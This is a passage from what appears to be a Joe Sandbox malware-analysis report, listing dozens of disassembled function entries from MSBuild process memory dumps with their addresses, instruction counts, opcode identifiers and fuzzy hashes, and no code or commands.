                        Function 06739761 Relevance: .1, Instructions: 51COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0187147e9deb7e526f5ad925cf7b90e8171bdaf657270c6b789022e48d2ab00d
                        • Instruction ID: 31ae306e320fd3d9fc200d8f7a6e4b98c685ef6a29008f7101892de6f70ee20b
                        • Opcode Fuzzy Hash: 0187147e9deb7e526f5ad925cf7b90e8171bdaf657270c6b789022e48d2ab00d
                        • Instruction Fuzzy Hash: 03116A74E05229DFCB14DFA5D5405ADBBF2FF88304F108428E546A7346DBB5A942CF90
                        Function 06736B17 Relevance: .0, Instructions: 50COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d5d6c51397a1d3bec40729173f1c503799ac490e7cc8af81993fb55c736e530f
                        • Instruction ID: 14cfe73cf2a729fbd3314bca3e4c8026a625859cf667ca355847474f9973ea86
                        • Opcode Fuzzy Hash: d5d6c51397a1d3bec40729173f1c503799ac490e7cc8af81993fb55c736e530f
                        • Instruction Fuzzy Hash: 6F111674A00229DFDB54DF69C888B9DBBF1BF48308F1584A9E505EB362DB709945CF40
                        Function 0676CCE0 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01aab2b5792e33d1018ccc80703af8fa62c49ed49b3d4fbd827185b7775d988c
                        • Instruction ID: 865b83e3a52df53c410bd4e115605620a47d0e64fafba679a935e88a1d55c729
                        • Opcode Fuzzy Hash: 01aab2b5792e33d1018ccc80703af8fa62c49ed49b3d4fbd827185b7775d988c
                        • Instruction Fuzzy Hash: 4511B675A40208EFCB41CFA9D9449A9BFF1EF08200F248499F949DB251D332DA61EF60
                        Function 0101FF07 Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 82c95809a862409afaa0a3ec023cbb3a817205568d72dc98407ee3722fa4f46d
                        • Instruction ID: 949c1dec7af70fc7592889d3281beda25787da515ea845a927b10512802e3a82
                        • Opcode Fuzzy Hash: 82c95809a862409afaa0a3ec023cbb3a817205568d72dc98407ee3722fa4f46d
                        • Instruction Fuzzy Hash: DE11F778201B05AFC724DF29E480946FBF5FF883147108A2AE85A87B15DB31F856CBE1
                        Function 0673F639 Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8271671f27c7fbd09df9d2b0a3ba02bf6777ddc985a6368ea7ba10e2eaadd002
                        • Instruction ID: 20605870b59972004529c0e6c8ab93427b590eebffdbdc6d839b94d87925b0ba
                        • Opcode Fuzzy Hash: 8271671f27c7fbd09df9d2b0a3ba02bf6777ddc985a6368ea7ba10e2eaadd002
                        • Instruction Fuzzy Hash: F001A931E06760DFCB659F18D9448727B65EA9228232A489AD149CB173F235EC42CB61
                        Function 0673E628 Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3837fd8c3ea9281def05aa96335f779ebdbf483ddb39424ba354af0bf9c4cb5d
                        • Instruction ID: 3b2efd56dd4b2086af9521d627d3c9f0b8431064e260ddbf2cccd181c382465c
                        • Opcode Fuzzy Hash: 3837fd8c3ea9281def05aa96335f779ebdbf483ddb39424ba354af0bf9c4cb5d
                        • Instruction Fuzzy Hash: 22014075A10609DFCB14DFA8D844CAEBBF9FF89310B10416AE905D7320DB30AD44CBA0
                        Function 06732E50 Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8ea9c8aeb52d65d5f88500ff5395906eed8033fda68cff2219baafe25d5e975
                        • Instruction ID: 8f73f41a2718e82c007ba012fafa257684754edd816aefcdcdf024b42e8c41fc
                        • Opcode Fuzzy Hash: a8ea9c8aeb52d65d5f88500ff5395906eed8033fda68cff2219baafe25d5e975
                        • Instruction Fuzzy Hash: 46F0967374521157D7205AAEBC889ABF79FEBD4671B10C03BE709C7607DE75880292B4
                        Function 0673E6D8 Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f49899a511fa255538eba60de75af3c005fc080416b5a9490f7431edf621aca
                        • Instruction ID: 2a7d841c60b839344299918d619e9940ee45425f8d3bdeb225b1f4e770603e53
                        • Opcode Fuzzy Hash: 8f49899a511fa255538eba60de75af3c005fc080416b5a9490f7431edf621aca
                        • Instruction Fuzzy Hash: 4601D6319001559FCB01CFA8D9048EF7FB1AF46320B1442A6E214EF1B2E7329A16CB91
                        Function 06732911 Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c81f7a2b1c46cce6b677ee51efe34357f29a4833e684dbc26ac2142d849c304
                        • Instruction ID: 3ca2e89c5aa37496cf539f2b4f138a6dde5daae4af9b1dc6b24731a92b4034fc
                        • Opcode Fuzzy Hash: 7c81f7a2b1c46cce6b677ee51efe34357f29a4833e684dbc26ac2142d849c304
                        • Instruction Fuzzy Hash: A80147316002254FC748CF6CDC40AAAFBBAEBC5200B10853AE41ACB393CB30AD05C3A0
                        Function 0676CE98 Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: af8c3639c9f2e4dd51ae312f797c556ff31646701b77dbbde8eba280727c7767
                        • Instruction ID: 89d0c149e0e8012557e5c7149dcf92ca4cc27b606d984cc3b0eb8f601bc0cbd0
                        • Opcode Fuzzy Hash: af8c3639c9f2e4dd51ae312f797c556ff31646701b77dbbde8eba280727c7767
                        • Instruction Fuzzy Hash: FF018F35604254AFD756CE6EC885C6ABBB9EB89220709815AFC44CB742C671EC42CB90
                        Function 01019618 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6cf78fb99f35cc14cd81de3deeeac7bb8ee3be5cdb9552a645342ff777afdbe1
                        • Instruction ID: 602f1dc5be173f0635c43b8a367eafbed34d60323759bdac32e35bf85ad71451
                        • Opcode Fuzzy Hash: 6cf78fb99f35cc14cd81de3deeeac7bb8ee3be5cdb9552a645342ff777afdbe1
                        • Instruction Fuzzy Hash: AE01BC302001058F8785EBB8E99956E7BA3EFC4354384993CF4169B714DE38BE4AC795
                        Function 06732C18 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c06e85f8f965eafdd0af4657bf3c21ba2952b2e0927b2f2ad9c64d99aecfe3ec
                        • Instruction ID: e27d5687752062a64b16292dceed6612eeee2208eb79f0140131ce133d1c2d56
                        • Opcode Fuzzy Hash: c06e85f8f965eafdd0af4657bf3c21ba2952b2e0927b2f2ad9c64d99aecfe3ec
                        • Instruction Fuzzy Hash: 4E0126716003541FC71AAB78AC5456ABBB7DFC22507148A3AEA12CF263DE71DE09D3A0
                        Function 00F2DAD5 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680000449.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_f2d000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e79ced10b61547ff5a63666062fe2265101630136b68082297143b727b766240
                        • Instruction ID: bddf5b41bb3ecc80b68227ca184cf958c43df1a503586a2cf84ec7e95283e315
                        • Opcode Fuzzy Hash: e79ced10b61547ff5a63666062fe2265101630136b68082297143b727b766240
                        • Instruction Fuzzy Hash: 7101A2725083509AE7108A29D994B67FFDCEF81334F18C56AED094A296C779D840EA71
                        Function 0676B270 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eb571c6c80ec7e23b04d1bbb1fb8e70fe07c5254f048360f02470964bf1c2fd9
                        • Instruction ID: 7f460dc70d9e0346c5871c644f33efb21f26ea2a6f0a8c839e61bad6b2f71de6
                        • Opcode Fuzzy Hash: eb571c6c80ec7e23b04d1bbb1fb8e70fe07c5254f048360f02470964bf1c2fd9
                        • Instruction Fuzzy Hash: DD01A2353505108FC744DF6AD444C69BBE9FF99A1131644AAEA05CB331DB32EC51CB90
                        Function 06765C8B Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 795f5e323944df22c58d3efc47e7988bd4b66d1d8c7cb32aecd900f3423d55fc
                        • Instruction ID: e810bdd1cd60895e6cdc7ab63b3eee66f9ae61bf52c21916813852d199065316
                        • Opcode Fuzzy Hash: 795f5e323944df22c58d3efc47e7988bd4b66d1d8c7cb32aecd900f3423d55fc
                        • Instruction Fuzzy Hash: 930184711413105FC316E725D91195AFB5AEE823103048B79D0464F726DE75ED4A8BE5
                        Function 0101FF18 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b3f0870028c13c0bc382218b4fffc1d489d3af19ce85b576a6d881a8063c612
                        • Instruction ID: acd1ed4ae9781f3ecdb33c028f3d3560a6a284bdba756a0544791dc0574a19e5
                        • Opcode Fuzzy Hash: 9b3f0870028c13c0bc382218b4fffc1d489d3af19ce85b576a6d881a8063c612
                        • Instruction Fuzzy Hash: 18019274601B15AFC724DF2AE580946FBF5FF893143108A2AE85A87B14DB31F859CBD1
                        Function 067347C3 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92ee84c5d746cf4cb0cdf91c9c852d6bf2392b66f704001beacaf9f3093ee09a
                        • Instruction ID: 84a1f4c218277900afb99eebcbe6ee6c1bb28e9039bb578ea704e52d89a5e436
                        • Opcode Fuzzy Hash: 92ee84c5d746cf4cb0cdf91c9c852d6bf2392b66f704001beacaf9f3093ee09a
                        • Instruction Fuzzy Hash: DF01C070D182AD9EEB18CB7AD8047FE7FF57B42300F048015D112B629ACB785445CBE1
                        Function 066FB660 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b35b105f079c26f7b18ddc426fecc384edbd54b5455216fdd1c176f7d05783b
                        • Instruction ID: 1824c52250d2926f6bbe88e4260663215a4972219ccc0a13b23d8fb09017141a
                        • Opcode Fuzzy Hash: 7b35b105f079c26f7b18ddc426fecc384edbd54b5455216fdd1c176f7d05783b
                        • Instruction Fuzzy Hash: B601A4717002156F87989B7AE81456EBFE7EFD9350304442AFA06C7341DF35AC1597A4
                        Function 066FA000 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fa3d9d9562c92a4d76089bcd3e2977b564b5e2bd1ed17bc103d3dc1a66993c60
                        • Instruction ID: 73d51b1d344dce1e9d2a38dd1e930d3c2093ad553e9596c0f1f5427a787e04e8
                        • Opcode Fuzzy Hash: fa3d9d9562c92a4d76089bcd3e2977b564b5e2bd1ed17bc103d3dc1a66993c60
                        • Instruction Fuzzy Hash: 4A01F230B003009BCB649B75E84562AB7A6EFC1614B00452DE90587380CF71A809C7E0
                        Function 06735B68 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97613eb9e9651d219cae9d2120426f107d6a40709c599fbffe455f55f2772f10
                        • Instruction ID: 09471de963072eb200db74da999e43e2f072efc988965e516d45354b1634ee05
                        • Opcode Fuzzy Hash: 97613eb9e9651d219cae9d2120426f107d6a40709c599fbffe455f55f2772f10
                        • Instruction Fuzzy Hash: 30012631305350DFE3151B789848766BFA2BF81314F50047EE68A8F283CA766806C361
                        Function 06760E01 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd2f8d2dc04592819526286d2ab42bac305b8cd2a3f19de0e385ab151bc26b14
                        • Instruction ID: 4be932c88cf95f523a8e12914f0e4ff4fd95c1d35c74f4205291e2415beaa33f
                        • Opcode Fuzzy Hash: fd2f8d2dc04592819526286d2ab42bac305b8cd2a3f19de0e385ab151bc26b14
                        • Instruction Fuzzy Hash: 27F0AF767002109FC705DB59E588C7ABBE6FFC961532941D6F409CB336CA22DC01CB60
                        Function 0676CC40 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6ae590147c8802e9256b574cad8deac480b86280553fcc7f52639ed9c231648
                        • Instruction ID: 75960f21a16fd74d8e9248dc16b00422e155636f2dd03e594b64bb3a25d5e6a7
                        • Opcode Fuzzy Hash: d6ae590147c8802e9256b574cad8deac480b86280553fcc7f52639ed9c231648
                        • Instruction Fuzzy Hash: DA01D8319043549FCB25CFA6C904AEEBBF6BF8C300F04456DE552B7251CB369900DBA0
                        Function 066FB653 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ea10173fa6aff6fab89b79887e2ab7d1f85d326ab850ee68fed7682a85a8b23
                        • Instruction ID: 81ef1ba31d7b5060515eb7b8dd6bc72d87e2e186063d4d466b100952a43ea69f
                        • Opcode Fuzzy Hash: 9ea10173fa6aff6fab89b79887e2ab7d1f85d326ab850ee68fed7682a85a8b23
                        • Instruction Fuzzy Hash: 8901FF717052286FC3559BBAE8049AABFE6BF8A310304442AF605C7251DB359815D7A4
                        Function 067366B1 Relevance: .0, Instructions: 41COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 54e3941b88b54ac8b8ee0aa9dcaba907f68e90d8f07e1d682784afb1b2f5c7ee
                        • Instruction ID: 38ae13723bcb7a5e44c7d6b78db6abc53307ebed098b913de56ae73b9833caec
                        • Opcode Fuzzy Hash: 54e3941b88b54ac8b8ee0aa9dcaba907f68e90d8f07e1d682784afb1b2f5c7ee
                        • Instruction Fuzzy Hash: 6D1129B4D0020ADFDB84DFA8C0496AEBBF1BF49300F50C56AD515E7211EB759689CF91
                        Function 0673F560 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 602d492a77ee08b89a6f3218af8293567f4df3eca1285aa6c059ab88f2b29c0a
                        • Instruction ID: 07a785e3e7f577da6955bcd3797ecab0bf38d18b16294dc842537e5daa3c355c
                        • Opcode Fuzzy Hash: 602d492a77ee08b89a6f3218af8293567f4df3eca1285aa6c059ab88f2b29c0a
                        • Instruction Fuzzy Hash: 36F0BE35F096619F87658A2D98548327BA6EFD9290319C07AE50ACB332D925CD41C790
                        Function 06738370 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 045ba869baa0567401b7f0e5ea7528140552c2f0b253313ae31c2c30c521e455
                        • Instruction ID: 2da9c1f8407d5b48db6098a962ae6c37169fae4849f0f2c3bec7525ee09902c4
                        • Opcode Fuzzy Hash: 045ba869baa0567401b7f0e5ea7528140552c2f0b253313ae31c2c30c521e455
                        • Instruction Fuzzy Hash: A1F024303002245FC7119B78D8448AE7BEA9FCB250308416BF941CB322DA34DD07CBA1
                        Function 06738FEF Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e4122c09d9f869dcf855b9f369cb274ca798816164cabdac721815e6ebee9d97
                        • Instruction ID: bed9faf14e10a1218daf7cb5187401a5e0d229fa6e5f3d6921e0abe27820e78a
                        • Opcode Fuzzy Hash: e4122c09d9f869dcf855b9f369cb274ca798816164cabdac721815e6ebee9d97
                        • Instruction Fuzzy Hash: 9C018175A006199FC750DF6AD88088AFBF5FF89310700C62AD91997714EB30F959CBE1
                        Function 06739990 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7ea585e8f5b870b71624bc7bf5c54e924437428761e7a28feea83291e563df9e
                        • Instruction ID: db44d35d04b81ec07ac92f5a98e3534a56431ba2f5c51851e358f97a971ecb48
                        • Opcode Fuzzy Hash: 7ea585e8f5b870b71624bc7bf5c54e924437428761e7a28feea83291e563df9e
                        • Instruction Fuzzy Hash: 2CF06D6160F3E05FD35747741C256A17F72AB83140B4E81DBE189CF5A3E2484C09C762
                        Function 01016760 Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7b6c61c3ef18483b1f085bff5e57d93fef5ca1e21b86292ba85387ba1a4fcf7
                        • Instruction ID: 475f47b7035503b6550785d7c3cc9a41ef479a5a97f5f8cb6dd4bb5fb704a5f2
                        • Opcode Fuzzy Hash: c7b6c61c3ef18483b1f085bff5e57d93fef5ca1e21b86292ba85387ba1a4fcf7
                        • Instruction Fuzzy Hash: A6016D35A001198BCF14EBA8D9157ED7BF2AB88300F20046ED445B7394DFBA1E05CB95
                        Function 06738FF0 Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8c9331fbcbfd0d770e1cbf5f0cd7f2f44ac00256148a7ef21754b3a9c24f6571
                        • Instruction ID: ba553eb2e92c01fb2011cf4c4bafb14421ce12564d50eb0308b4f781a07805a4
                        • Opcode Fuzzy Hash: 8c9331fbcbfd0d770e1cbf5f0cd7f2f44ac00256148a7ef21754b3a9c24f6571
                        • Instruction Fuzzy Hash: 0F018171A006199FC750DF6AD88088AFBF5FF89310700C62AD91997714EB30F959CBE1
                        Function 0673FC40 Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7e22c8d95a267705572d53a9a21d65ad8e5fb57ba07006bb25e5f2b550177a2f
                        • Instruction ID: 10685c7c5572b4620fe3c1882e668ed364b6487393365fdf36d85eb4486b6d55
                        • Opcode Fuzzy Hash: 7e22c8d95a267705572d53a9a21d65ad8e5fb57ba07006bb25e5f2b550177a2f
                        • Instruction Fuzzy Hash: 8F018FB0E8432D9FD740EF68D81576E7FB5AB45348F00419AE855A7286CBBC4608CB81
                        Function 0673D4A0 Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ef2b230489b97edbfaa1deaad275d5ceaed607c3dc1a50d4555cf9f0499fea59
                        • Instruction ID: 23b38d76f043d1cb186d606a5b8e78257737927118b6ce00cd9a4cbebc99296b
                        • Opcode Fuzzy Hash: ef2b230489b97edbfaa1deaad275d5ceaed607c3dc1a50d4555cf9f0499fea59
                        • Instruction Fuzzy Hash: 1801E471640B049FC324DF2AC984957FBF5FF88310B008A2AE48A87775EA71F8498B94
                        Function 06765C7D Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 46be20f3505a130dbf3aa81df9b1b859e8a42122c124482785f78c6100a08104
                        • Instruction ID: c4afd02347290b758f7de5baae4bcaedffa10fa2e62477e9a4c10c95c56d997b
                        • Opcode Fuzzy Hash: 46be20f3505a130dbf3aa81df9b1b859e8a42122c124482785f78c6100a08104
                        • Instruction Fuzzy Hash: 52F069397001168FDB45DFA4E445AAC77B2EF88220F24416AE906EB361DF35DD458B90
                        Function 067366C0 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0ee20e75c35f4087f5154d570be463ca5a8535cddf769bc12815130cb1cd8778
                        • Instruction ID: 1c9882c02bfaa216ff106a50b31b46ec79522a4959585a4d45509211e573a189
                        • Opcode Fuzzy Hash: 0ee20e75c35f4087f5154d570be463ca5a8535cddf769bc12815130cb1cd8778
                        • Instruction Fuzzy Hash: 970108B4D0020ADFCB44DFA8C0496AEBBF1BF08304F50C56AD919EB251EB759689CF80
                        Function 067347D0 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
